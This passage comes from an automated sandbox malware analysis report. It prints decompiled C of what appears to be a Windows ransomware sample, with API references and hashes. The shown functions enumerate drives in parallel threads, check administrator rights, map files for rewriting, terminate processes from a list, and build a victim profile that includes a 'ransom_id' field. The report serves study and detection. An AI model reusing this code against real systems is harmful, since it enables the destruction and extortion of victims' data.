				intOrPtr _t92;
				intOrPtr _t95;
				char _t101;
				intOrPtr _t106;
				void _t110;
				struct _SECURITY_ATTRIBUTES** _t114;
				intOrPtr _t115;
				signed int _t119;
				void* _t121;

				_t121 = (_t119 & 0xfffffff8) - 0x3c4;
				_t87 = __ecx;
				_v964 = __ecx;
				_t67 = VirtualAlloc(0, 0x18, 0x3000, 4);
				 *((intOrPtr*)(_t67 + 4)) = _t87;
				_t88 = 0;
				 *_t67 = 0x43;
				_t68 =  *L"?:\\"; // 0x3a003f
				_v924 = _t68;
				_t69 =  *0x40e308; // 0x5c
				_v920 = _t69;
				_v968 = GetTickCount();
				_t114 =  &_v644;
				_t110 = 0x41;
				do {
					_v924 = _t110;
					_t72 = GetDriveTypeW( &_v924);
					if(_t72 >= 2 && _t72 != 5) {
						 *((intOrPtr*)(_t114 - 4)) = _v964;
						_t84 = _t114 - 8;
						 *_t84 = _t110;
						 *_t114 = 0;
						_t114[2] = 0;
						_t114[3] = 0;
						 *((intOrPtr*)(_t121 + 0x48 + _t88 * 4)) = CreateThread(0, 0, E00406840, _t84, 0, 0);
						_t88 = _t88 + 1;
						_t114 =  &(_t114[6]);
					}
					_t110 = _t110 + 1;
				} while (_t110 <= 0x5a);
				_v952 = _t88;
				asm("xorps xmm0, xmm0");
				_v956 = 0;
				_v960 = 0;
				asm("movlpd [esp+0x38], xmm0");
				asm("movlpd [esp+0x30], xmm0");
				WaitForMultipleObjects(_t88,  &_v908, 1, 0xffffffff);
				_t75 = GetTickCount();
				asm("xorps xmm0, xmm0");
				_t115 = _v948;
				_v932 = _t75 - _v968;
				_t77 = 0;
				_v964 = 0;
				asm("movlpd [esp+0x40], xmm0");
				if(_t88 < 2) {
					_t95 = _v940;
					_t106 = _v944;
				} else {
					_t26 = _t88 - 2; // -1
					_t92 = _v940;
					_t82 =  &_v612;
					_t101 = (_t26 >> 1) + 1;
					_v968 = _t101;
					_v928 = _t101 + _t101;
					_t106 = _v944;
					do {
						_t92 = _t92 +  *((intOrPtr*)(_t82 - 0x18));
						_v956 = _v956 +  *((intOrPtr*)(_t82 - 0x20));
						asm("adc edi, [eax-0x14]");
						_t115 = _t115 +  *_t82;
						_v960 = _v960 +  *((intOrPtr*)(_t82 - 8));
						asm("adc edx, [eax+0x4]");
						_t82 = _t82 + 0x30;
						_t41 =  &_v968;
						 *_t41 = _v968 - 1;
					} while ( *_t41 != 0);
					_t77 = _v928;
					_v968 = _t92;
					_t88 = _v952;
					_t95 = _v968;
				}
				if(_t77 >= _t88) {
					_t89 = _v916;
				} else {
					_t80 = _t77 + _t77 * 2;
					_v964 =  *((intOrPtr*)(_t121 + 0x150 + _t80 * 8));
					_t89 =  *((intOrPtr*)(_t121 + 0x158 + _t80 * 8));
				}
				asm("adc edx, edi");
				asm("adc edx, eax");
				return E00405540(_v960 + _v956 + _v964, _v932, _t115 + _t95 + _t89, _t106);
			}

APIs

VirtualAlloc.KERNEL32(00000000,00000018,00003000,00000004), ref: 00403E00
GetTickCount.KERNEL32 ref: 00403E25
GetDriveTypeW.KERNEL32(?), ref: 00403E4A
CreateThread.KERNEL32 ref: 00403E89
WaitForMultipleObjects.KERNEL32(00000000,?), ref: 00403ECB
GetTickCount.KERNEL32 ref: 00403ED1

Strings

?:\, xrefs: 00403E13

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: CountTick$AllocCreateDriveMultipleObjectsThreadTypeVirtualWait
String ID: ?:\
API String ID: 458387131-2533537817
Opcode ID: 3380b7a9da389f35d06b469346c9bb498d51bc5a763c595ddef6b732e49dbda3
Instruction ID: a427c5faede150c50d802e976730206525a879d89cb9664245e235534ffcdea3
Opcode Fuzzy Hash: 3380b7a9da389f35d06b469346c9bb498d51bc5a763c595ddef6b732e49dbda3
Instruction Fuzzy Hash: FF5136719083019FC310CF14C988B5BBBE5FF88315F504A2EFA89A73A1D375A944CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00406840 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406840(void* _a4) {
				intOrPtr _v0;
				intOrPtr _v4;
				long _v8;
				intOrPtr _v12;
				void* _v16;
				struct _CRITICAL_SECTION _v40;
				WCHAR* _t12;
				void* _t22;

				_t12 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
				_t22 = _a4;
				wsprintfW(_t12, L"%c:\\",  *_t22 & 0x0000ffff);
				InitializeCriticalSection( &_v40);
				_v12 = 0x2710;
				_v8 = 0;
				_v4 = 0xffffffff;
				_v0 = 0xffffffff;
				_v16 = VirtualAlloc(0, 0x9c40, 0x3000, 4);
				E004066F0(_t22 + 8, _t12,  &_v40,  *((intOrPtr*)(_t22 + 4)), _t22 + 8, _t22 + 0x10);
				VirtualFree(_t22, 0, 0x8000);
				ExitThread(0);
			}

0x00406859
0x0040685f
0x0040686e
0x0040687c
0x00406890
0x00406898
0x004068a0
0x004068a8
0x004068b6
0x004068cb
0x004068db
0x004068e3

APIs

VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040), ref: 00406859
wsprintfW.USER32 ref: 0040686E
InitializeCriticalSection.KERNEL32(?), ref: 0040687C
VirtualAlloc.KERNEL32 ref: 004068B0

Part of subcall function 004066F0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 00406723
Part of subcall function 004066F0: lstrcatW.KERNEL32(00000000,00410364), ref: 0040673B
Part of subcall function 004066F0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00406745

VirtualFree.KERNEL32(?,00000000,00008000,00009C40,00003000,00000004), ref: 004068DB
ExitThread.KERNEL32 ref: 004068E3

Strings

%c:\, xrefs: 00406868

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$CriticalExitFileFindFirstFreeInitializeSectionThreadlstrcatlstrlenwsprintf
String ID: %c:\
API String ID: 1988002015-3142399695
Opcode ID: 234e897b3db6d0822de12132551c07e096dda7dd2848727a29eb3a1be7f74770
Instruction ID: d88b45d10d8f236cef520cbec221070cd426d639c7b6d1ffd4d7ad39dfd3f75c
Opcode Fuzzy Hash: 234e897b3db6d0822de12132551c07e096dda7dd2848727a29eb3a1be7f74770
Instruction Fuzzy Hash: 800196B5244300BFE7109F50CD8EF577BA8AB84B14F004628FB65AD1E2D7B09904CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00403A60 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00403A60() {
				signed int _v8;
				void* _v12;
				short _v16;
				struct _SID_IDENTIFIER_AUTHORITY _v20;
				int _t13;
				_Unknown_base(*)()* _t15;
				signed int _t16;

				_v20.Value = 0;
				_v16 = 0x500;
				_t13 = AllocateAndInitializeSid( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				if(_t13 != 0) {
					_t15 = GetProcAddress(GetModuleHandleA("advapi32.dll"), "CheckTokenMembership");
					_t5 =  &_v8; // 0x404a63
					_t16 =  *_t15(0, _v12, _t5);
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t16;
					FreeSid(_v12);
					_t10 =  &_v8; // 0x404a63
					return  *_t10;
				} else {
					return _t13;
				}
			}

0x00403a69
0x00403a89
0x00403a90
0x00403a98
0x00403aaf
0x00403ab5
0x00403abe
0x00403ac5
0x00403ac7
0x00403aca
0x00403ad0
0x00403ad6
0x00403a9d
0x00403a9d
0x00403a9d

APIs

AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00403A90
GetModuleHandleA.KERNEL32(advapi32.dll), ref: 00403AA3
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00403AAF
FreeSid.ADVAPI32(?), ref: 00403ACA

Strings

CheckTokenMembership, xrefs: 00403AA9
cJ@, xrefs: 00403AB5, 00403AD0, 00403AB8
advapi32.dll, xrefs: 00403A9E

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: AddressAllocateFreeHandleInitializeModuleProc
String ID: CheckTokenMembership$advapi32.dll$cJ@
API String ID: 3309497720-3398485638
Opcode ID: 4468bd7a1b991eef61b30ffc9688bd5fffe7c89f6fdc7d751bd3f5c612f6d095
Instruction ID: 33a1519f93ae69caf91dd4e42da6a452692d52d9b4e3223079b77a4f0d81269a
Opcode Fuzzy Hash: 4468bd7a1b991eef61b30ffc9688bd5fffe7c89f6fdc7d751bd3f5c612f6d095
Instruction Fuzzy Hash: D2F03C30A40209BBEB109BE0DD0EFADBB7CEB04705F1045A5FA04B62D1E6745A108B59

Uniqueness

Uniqueness Score: -1.00%

Function 00402890 Relevance: 12.1, APIs: 8, Instructions: 90
fileCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00402890(WCHAR* __ecx, intOrPtr __edx) {
				long _v8;
				intOrPtr _v12;
				void* _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				void* _t18;
				void* _t23;
				WCHAR* _t29;
				void* _t34;
				signed int _t35;
				long _t37;
				void* _t38;
				void* _t40;

				_t29 = __ecx;
				_t28 = 0;
				_v12 = __edx;
				_t34 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
				if(_t34 == 0xffffffff) {
					L3:
					return 0;
				} else {
					_v8 = GetFileSize(_t34, 0);
					E00403030(0, _t34, _t35);
					asm("sbb esi, esi");
					_t37 = (_t35 & 0x00000003) + 1;
					_t14 = E00403030(0, _t34, _t37);
					asm("sbb eax, eax");
					_t18 = CreateFileMappingW(_t34, 0, ( ~_t14 & 0xfffffffa) + 8, 0, 0, 0);
					_v16 = _t18;
					if(_t18 != 0) {
						_t38 = MapViewOfFile(_t18, _t37, 0, 0, 0);
						if(_t38 != 0) {
							_t23 = E00403030(0, _t34, _t38);
							if(_t23 == 0) {
								_push(_t29);
								_t4 = _t38 + 0x53; // 0x53
								_t29 = _t4;
								_t5 = _t23 + 6; // 0x6
								E00407DB0(_t29, _t5);
								_t40 = _t40 + 4;
							}
							_push(_t29);
							_t28 = E00402830(_v12, _t38, _v8);
							UnmapViewOfFile(_t38);
						}
						CloseHandle(_v16);
						CloseHandle(_t34);
						return _t28;
					} else {
						CloseHandle(_t34);
						goto L3;
					}
				}
			}

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,74CF82B0,00000000,?,?,00402C02), ref: 004028AB
GetFileSize.KERNEL32(00000000,00000000,?,?,00402C02), ref: 004028BA
CreateFileMappingW.KERNEL32(00000000,00000000,-00000008,00000000,00000000,00000000,?,?,00402C02), ref: 004028E5
CloseHandle.KERNEL32(00000000,?,?,00402C02), ref: 004028F3
MapViewOfFile.KERNEL32(00000000,74CF82B1,00000000,00000000,00000000,?,?,00402C02), ref: 0040290A
UnmapViewOfFile.KERNEL32(00000000,?,?,?,?,00402C02), ref: 00402942
CloseHandle.KERNEL32(?,?,?,00402C02), ref: 00402951
CloseHandle.KERNEL32(00000000,?,?,00402C02), ref: 00402954

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateView$MappingSizeUnmap
String ID:
API String ID: 265113797-0
Opcode ID: c3a6c9024250ff713cce5d39a0f05ce3fc450d2e8e024756add73c0ab4eb3eab
Instruction ID: c7753fadabc3ce0f8503889d90d66a1a67b62c86d4c9c93fbc6d336bdc04640e
Opcode Fuzzy Hash: c3a6c9024250ff713cce5d39a0f05ce3fc450d2e8e024756add73c0ab4eb3eab
Instruction Fuzzy Hash: 8A2134B2B011197FE7106B749D8AF7F7B6CEB45225F00423AFC01B22C1E6789D0045A8

Uniqueness

Uniqueness Score: -1.00%

Function 004033E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E004033E0(int* __ecx, void* __eflags, char _a4) {
				int* _v8;
				void* _t8;
				char _t10;
				void* _t14;
				void* _t15;
				char _t18;
				char _t19;
				int _t20;
				CHAR* _t23;
				CHAR* _t26;
				CHAR* _t35;
				CHAR* _t40;

				_push(__ecx);
				_t1 =  &_a4; // 0x405135
				_t26 =  *_t1;
				_t37 = __ecx;
				_v8 = __ecx;
				__ecx[3] = _t26;
				_t8 = E004032B0(__ecx);
				if(_t8 == 0 || _t8 == 0xffffffff) {
					ExitProcess(0);
				}
				if(E00403320(__ecx) == 0) {
					 *__ecx = 0;
					_t10 =  *_t26;
					if(_t10 == 0) {
						goto L4;
					} else {
						do {
							if(_t10 == 0x7b) {
								_t26 =  &(_t26[1]);
								_t14 = E00403190(_t26);
								if(_t14 != 0) {
									_t15 = _t14 - 1;
									if(_t15 == 0) {
										E00403200(_t37, _t26, 1);
									} else {
										if(_t15 == 1) {
											_t18 =  *_t26;
											_t35 = _t26;
											if(_t18 == 0) {
												L15:
												_t19 =  *_t35;
												if(_t19 != 0x7d) {
													_t40 = _t35;
													if(_t19 != 0) {
														while( *_t40 != 0x7d) {
															_t40 =  &(_t40[1]);
															if( *_t40 != 0) {
																continue;
															} else {
															}
															goto L21;
														}
														 *_t40 = 0;
													}
													L21:
													_t20 = lstrlenA(_t35);
													_t23 = HeapAlloc(GetProcessHeap(), 8, _t20 + 1);
													 *(_v8 + 8) = _t23;
													if(_t23 != 0) {
														lstrcpyA(_t23, _t35);
													}
													 *_t40 = 0x7d;
													_t37 = _v8;
												}
											} else {
												while(_t18 != 0x7d) {
													_t35 =  &(_t35[1]);
													if(_t18 == 0x3d) {
														goto L15;
													} else {
														_t18 =  *_t35;
														if(_t18 != 0) {
															continue;
														} else {
															goto L15;
														}
													}
													goto L25;
												}
											}
										}
									}
								}
							}
							L25:
							_t10 = _t26[1];
							_t26 =  &(_t26[1]);
						} while (_t10 != 0);
						return 1;
					}
				} else {
					 *__ecx = 1;
					L4:
					return 1;
				}
			}

APIs

Part of subcall function 004032B0: lstrlenA.KERNEL32(?,00000000,?,5Q@,?,?,004033F6,?,74CB66A0,?,?,00405135,00000000), ref: 004032C5
Part of subcall function 004032B0: lstrlenA.KERNEL32(?,?,004033F6,?,74CB66A0,?,?,00405135,00000000), ref: 004032EE

lstrlenA.KERNEL32(5Q@,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 00403484
GetProcessHeap.KERNEL32(00000008,00000001,?,00405135,00000000), ref: 0040348E
HeapAlloc.KERNEL32(00000000,?,00405135,00000000), ref: 00403495
lstrcpyA.KERNEL32(00000000,5Q@,?,00405135,00000000), ref: 004034A7
ExitProcess.KERNEL32 ref: 004034DB

Strings

5Q@, xrefs: 004033E5, 0040343B, 00403483, 004034A5, 004034B7

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: lstrlen$HeapProcess$AllocExitlstrcpy
String ID: 5Q@
API String ID: 1867342102-144561132
Opcode ID: 21661da1c7e2a165306f5dc85369bd9d986d501ed5d2751d7a9df859c23e26cf
Instruction ID: a602f992c252cea2a24e073b1cce2c09e2fd92cb4485f691b182cac4319fe13f
Opcode Fuzzy Hash: 21661da1c7e2a165306f5dc85369bd9d986d501ed5d2751d7a9df859c23e26cf
Instruction Fuzzy Hash: BA31E3305042455AEB265F289C447B77FAC9B06312F1841BBE8C5BF3C2D67D4E4787A9

Uniqueness

Uniqueness Score: -1.00%

Function 00402C50 Relevance: 10.6, APIs: 7, Instructions: 62
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00402C50(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				struct tagPAINTSTRUCT _v68;
				struct tagPAINTSTRUCT _v88;
				short _v100;
				intOrPtr _t13;
				void* _t15;
				struct HDC__* _t21;
				int _t30;

				_t13 =  *0x40e290; // 0x21
				asm("movdqu xmm0, [0x40e280]");
				_t30 = _a8;
				_v88.fErase = _t13;
				asm("movdqu [esp+0x10], xmm0");
				_t15 = _t30 - 2;
				if(_t15 == 0) {
					CreateThread(0, 0, E00402AD0, 0, 0, 0);
					DestroyWindow(_a4);
					return 0xdeadbeef;
				} else {
					if(_t15 == 0xd) {
						_t21 = BeginPaint(_a4,  &_v68);
						TextOutW(_t21, 5, 5,  &_v100, lstrlenW( &_v100));
						EndPaint(_a4,  &_v88);
						return 0;
					} else {
						return DefWindowProcW(_a4, _t30, _a12, _a16);
					}
				}
			}

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00402C8A
BeginPaint.USER32(?,?), ref: 00402C9F
lstrlenW.KERNEL32(?), ref: 00402CAC
TextOutW.GDI32(00000000,00000005,00000005,?,00000000), ref: 00402CBD
EndPaint.USER32(?,?), ref: 00402CCB
CreateThread.KERNEL32 ref: 00402CE9
DestroyWindow.USER32(?), ref: 00402CF2

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: PaintWindow$BeginCreateDestroyProcTextThreadlstrlen
String ID:
API String ID: 572880375-0
Opcode ID: c81bb7d4f7cc3b0479ad99f25df51467dc5e8c815c493290e282321582db75ec
Instruction ID: 316be470bdb16b495eaa6a8a4de42634492684a59cc3721c0e018fd81b09cf01
Opcode Fuzzy Hash: c81bb7d4f7cc3b0479ad99f25df51467dc5e8c815c493290e282321582db75ec
Instruction Fuzzy Hash: D5116332604209ABE711DF54EE0DFAA7B6CFB48311F000626FD45E91E1E7B19D24DB99

Uniqueness

Uniqueness Score: -1.00%

Function 00404B10 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
processCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00404B10(WCHAR* __ecx) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v92;
				intOrPtr _t15;
				intOrPtr _t16;
				WCHAR* _t25;

				asm("xorps xmm0, xmm0");
				_t25 = __ecx;
				asm("movdqu [ebp-0x10], xmm0");
				E00408B30( &_v92, 0, 0x44);
				_t15 =  *0x412b0c; // 0x55c
				_v92.hStdError = _t15;
				_v92.hStdOutput = _t15;
				_t16 =  *0x412b08; // 0x558
				_v92.dwFlags = _v92.dwFlags | 0x00000101;
				_v92.hStdInput = _t16;
				_v92.wShowWindow = 0;
				_v92.cb = 0x44;
				if(CreateProcessW(0, _t25, 0, 0, 1, 0, 0, 0,  &_v92,  &_v20) != 0) {
					CloseHandle(_v20);
					return CloseHandle(_v20.hThread);
				} else {
					return GetLastError();
				}
			}

0x00404b1c
0x00404b22
0x00404b24
0x00404b29
0x00404b2e
0x00404b36
0x00404b39
0x00404b3c
0x00404b41
0x00404b48
0x00404b4d
0x00404b58
0x00404b77
0x00404b8d
0x00404b98
0x00404b79
0x00404b83
0x00404b83

APIs

_memset.LIBCMT ref: 00404B29
CreateProcessW.KERNEL32 ref: 00404B6F
GetLastError.KERNEL32(?,?,00000000), ref: 00404B79
CloseHandle.KERNEL32(?,?,?,00000000), ref: 00404B8D
CloseHandle.KERNEL32(?,?,?,00000000), ref: 00404B92

Strings

D, xrefs: 00404B58

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateErrorLastProcess_memset
String ID: D
API String ID: 1393943095-2746444292
Opcode ID: 61a65e664a15e54d92a6dad92bb0d9419f95a51cc1df3f98730657d9a343b283
Instruction ID: c9167ab5344422c8a44933cba82276f3a3bd4aa998c81f02b44ccbb638d81527
Opcode Fuzzy Hash: 61a65e664a15e54d92a6dad92bb0d9419f95a51cc1df3f98730657d9a343b283
Instruction Fuzzy Hash: E3014471E40319ABDB10DFA4DC46BDE7BB8EF04714F104226FA08FA190E7B569548B98

Uniqueness

Uniqueness Score: -1.00%

Function 004047F8 Relevance: 10.5, APIs: 7, Instructions: 46
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004047F8(void* __ebx, WCHAR* __ecx, void* __esi, void* __ebp, void* _a12) {
				int _t8;
				int _t9;
				void* _t15;
				WCHAR* _t17;
				void* _t18;
				signed int _t23;
				void* _t24;
				void* _t28;

				_t17 = __ecx;
				_t15 = __ebx;
				while(1) {
					L2:
					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
					if(_t8 == 0) {
						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
						if(_t18 != 0) {
							TerminateProcess(_t18, 0);
							CloseHandle(_t18);
						}
					}
					_t23 = _t23 + 1;
					_t5 = _t15 + 0x24; // 0x24
					_t17 = _t5;
					if(_t23 < 0x27) {
						continue;
					}
					L7:
					_t24 = _a12;
					_t9 = Process32NextW(_t24, _t15);
					_t7 = _t15 + 0x24; // 0x24
					_t17 = _t7;
					if(_t9 != 0) {
						_t23 = 0;
						do {
							goto L2;
						} while (_t23 < 0x27);
						goto L7;
					}
					if(_t15 != 0) {
						VirtualFree(_t15, 0, 0x8000);
					}
					return CloseHandle(_t24);
					L2:
					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
					if(_t8 == 0) {
						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
						if(_t18 != 0) {
							TerminateProcess(_t18, 0);
							CloseHandle(_t18);
						}
					}
					_t23 = _t23 + 1;
					_t5 = _t15 + 0x24; // 0x24
					_t17 = _t5;
				}
			}

0x004047f8
0x004047f8
0x00404800
0x00404800
0x00404805
0x0040480d
0x0040481b
0x0040481f
0x00404824
0x00404831
0x00404831
0x0040481f
0x0040483b
0x0040483c
0x0040483c
0x00404842
0x00000000
0x00000000
0x00404844
0x00404844
0x0040484a
0x00404850
0x00404850
0x00404855
0x004047f4
0x00404800
0x00000000
0x00000000
0x00000000
0x00404800
0x00404859
0x00404863
0x00404863
0x00404872
0x00404800
0x00404805
0x0040480d
0x0040481b
0x0040481f
0x00404824
0x00404831
0x00404831
0x0040481f
0x0040483b
0x0040483c
0x0040483c
0x0040483f

APIs

lstrcmpiW.KERNEL32(00000002,00000024), ref: 00404805
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00404815
TerminateProcess.KERNEL32(00000000,00000000), ref: 00404824
CloseHandle.KERNEL32(00000000), ref: 00404831
Process32NextW.KERNEL32(?,00000000), ref: 0040484A
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00404863
CloseHandle.KERNEL32(?), ref: 0040486A

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: CloseHandleProcess$FreeNextOpenProcess32TerminateVirtuallstrcmpi
String ID:
API String ID: 999196985-0
Opcode ID: 96ca63748bec8ddf27f1aab28855f42674f0454dc6f50e2837a6c1d9c7404263
Instruction ID: 1a13c8a93cbec1d8c6bc579d8d4bacd9a5b995379d62742e90ee94b5f9f4cf80
Opcode Fuzzy Hash: 96ca63748bec8ddf27f1aab28855f42674f0454dc6f50e2837a6c1d9c7404263
Instruction Fuzzy Hash: 7E01D6B7200111ABEB102F10AD48B6B7368EBD5301F104435FF49B61A1EB759C05CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004039B0 Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 41
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004039B0(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a28, intOrPtr _a36, intOrPtr _a44, intOrPtr _a52, intOrPtr _a60, intOrPtr _a76, intOrPtr _a84) {
				intOrPtr* _t44;

				_t44 = __ecx;
				 *__ecx = _a4;
				 *((intOrPtr*)(__ecx + 0xc)) = _a12;
				 *((intOrPtr*)(__ecx + 0x24)) = _a28;
				 *((intOrPtr*)(__ecx + 0x30)) = _a36;
				 *((intOrPtr*)(__ecx + 0x3c)) = _a44;
				 *((intOrPtr*)(__ecx + 0x48)) = _a52;
				 *((intOrPtr*)(__ecx + 0x54)) = _a60;
				 *((intOrPtr*)(__ecx + 0x74)) = _a76;
				 *(__ecx + 4) = L"pc_user";
				 *(__ecx + 0x10) = L"pc_name";
				 *((intOrPtr*)(__ecx + 0x18)) = 1;
				 *(__ecx + 0x1c) = L"pc_group";
				 *(__ecx + 0x28) = L"av";
				 *(__ecx + 0x34) = L"pc_lang";
				 *(__ecx + 0x40) = L"pc_keyb";
				 *(__ecx + 0x4c) = L"os_major";
				 *(__ecx + 0x58) = L"os_bit";
				 *((intOrPtr*)(__ecx + 0x60)) = 1;
				 *(__ecx + 0x64) = L"ransom_id";
				 *((intOrPtr*)(__ecx + 0x78)) = L"hdd";
